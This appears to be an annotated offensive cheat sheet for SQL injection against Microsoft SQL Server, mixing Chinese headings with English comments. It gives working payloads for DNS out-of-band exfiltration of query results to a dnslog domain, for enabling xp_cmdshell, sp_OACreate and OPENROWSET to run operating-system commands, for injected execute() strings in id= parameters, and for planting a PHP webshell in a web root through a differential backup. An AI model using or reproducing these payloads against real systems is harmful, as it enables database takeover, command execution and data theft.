SQLI

DNS带外

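-- DNS out-of-band exfiltration: fn_trace_gettable() opens the trace file from a UNC path, so the
-- host-name lookup for that path carries the injected value to an attacker-observed DNS zone
-- (replace xxx.dnslog.cn with your own logging domain). Requires ALTER TRACE permission on the
-- server (sysadmin has it).
-- Fix: the original wrote @@version(); @@version is a built-in variable and takes no parentheses.
-- Caveat: @@version is several hundred characters with spaces and line breaks, which cannot form a
-- DNS label (63 octets max, no whitespace), so in practice exfiltrate a short value (e.g. @@servername
-- or one column) or a substring of it. SELECT ... INTO fails if temp_trc already exists; drop it
-- or pick a new name between runs.
select * into temp_trc from fn_trace_gettable('\\'+(select @@version)+'.xxx.dnslog.cn\1.trc',default);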

GETSHELL

xp_cmdshell

-- Enable xp_cmdshell: 'show advanced options' must be on before the xp_cmdshell option can be set.
-- Changing an option and running RECONFIGURE needs the ALTER SETTINGS server permission (held by
-- sysadmin and serveradmin); the change is instance-wide and persistent, so it is visible to defenders.
-- xp_cmdshell itself requires sysadmin and runs the command as the SQL Server service account
-- (non-sysadmin callers, if granted, run under the configured proxy account).
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

exec xp_cmdshell 'whoami';
-- no stacked injection needed: T-SQL does not require a separator between statements, and
-- execute() runs a whole batch passed as one string literal
-- time-based check: a 10 s delay confirms the injection point executes T-SQL
id=1 if 1=1 waitfor delay '0:0:10';
-- the doubled single quotes ('') are quote escaping inside the execute() string literal
id=1 execute('exec sp_configure ''show advanced options'',
1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell
''dir''');

sp_oacreate

-- Alternative to xp_cmdshell via OLE Automation (sp_OACreate / sp_OAMethod). 'Ole Automation
-- Procedures' is also an advanced option, so enabling it needs ALTER SETTINGS (sysadmin/serveradmin).
-- WITH OVERRIDE skips value validation on RECONFIGURE.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;

-- Instantiates WScript.Shell and calls Run(). Run() returns only the exit code, not stdout, which
-- is why the command redirects its output to a file (D:\1.txt) that must be readable afterwards.
-- sp_OACreate requires sysadmin unless EXECUTE on it has been granted explicitly. The COM object is
-- destroyed at the end of the batch; call sp_OADestroy @shell to release it earlier.
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c whoami > D:\1.txt'

openrowset

-- 'Ad Hoc Distributed Queries' lets OPENROWSET/OPENDATASOURCE connect with an arbitrary OLE DB
-- connection string. Here it loops back into the local instance so xp_cmdshell output comes back as a
-- result set, which matters when the injection point only returns SELECT rows. The separator-less
-- exec/reconfigure sequence is valid T-SQL; ALTER SETTINGS (sysadmin/serveradmin) is needed as above.
-- xp_cmdshell must still be enabled separately (see the xp_cmdshell section).
exec sp_configure 'show advanced options',1 reconfigure exec sp_configure 'Ad Hoc Distributed Queries',1 reconfigure

-- NOTE(review): 'dsn=locaserver' names an ODBC data source that must exist on the target; if it does
-- not, 'server=(local);trusted_connection=yes' (or the instance name) is the usual form -- confirm
-- on the target. trusted_connection=yes makes the loopback authenticate as the SQL Server service's
-- Windows identity, which is typically sysadmin on the instance.
-- SET FMTONLY OFF makes the inner batch actually execute instead of only returning metadata; WITH
-- RESULT SETS declares the single varchar(max) column the provider needs to shape the rows.
select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set
fmtonly off
exec master..xp_cmdshell ''dir c:''with RESULT SETS((a varchar(max)))')

其他执行命令

上面几个操作在实战中基本够用了；其他执行命令的方式可参看文末 Reference 中列出的文章。

差异备份文件getshell

上面的命令执行方式均需要 sysadmin 级别权限；而 BACKUP DATABASE 只需当前库的 db_owner（dbo）或 db_backupoperator 权限，因此只有 dbo 权限时也可以尝试差异备份写 shell。前提是 SQL Server 服务账户对网站目录有写权限，且该目录下的 .php 会被 Web 服务器执行。

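-- Differential-backup webshell. BACKUP DATABASE needs db_owner / db_backupoperator on the database
-- (or sysadmin), not server-level command execution. The files are written by the SQL Server service
-- account, which therefore needs write access to the web root (D:\phpstudy_pro\WWW here), and the web
-- server must execute .php from that directory.
-- Step 1: a full backup is the required base for the differential below.
backup database users to disk='D:\phpstudy_pro\WWW\a.bak';
use users;
-- Guard the DROP so the sequence also works on a database that has no 'cmd' table yet; an
-- unconditional DROP raises an error there, which through an injection point may stop the batch.
if object_id('cmd', 'U') is not null drop table cmd;
create table cmd(t TEXT);
-- The payload ends with '/*' so the binary backup data that follows it inside shell.php is treated by
-- PHP as an unterminated block comment; bytes before '<?php' are emitted as plain output.
insert into cmd(t) values('<?php phpinfo();/*');
-- Step 2: the differential contains only pages changed since a.bak, i.e. essentially the new table,
-- so the payload lands in shell.php. FORMAT overwrites the media header. Both files stay in the web
-- root -- remove them and drop the table when done.
backup database users to disk='D:\phpstudy_pro\WWW\shell.php' WITH DIFFERENTIAL,FORMAT;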

Reference

https://xz.aliyun.com/t/7534
https://forum.90sec.com/t/topic/1113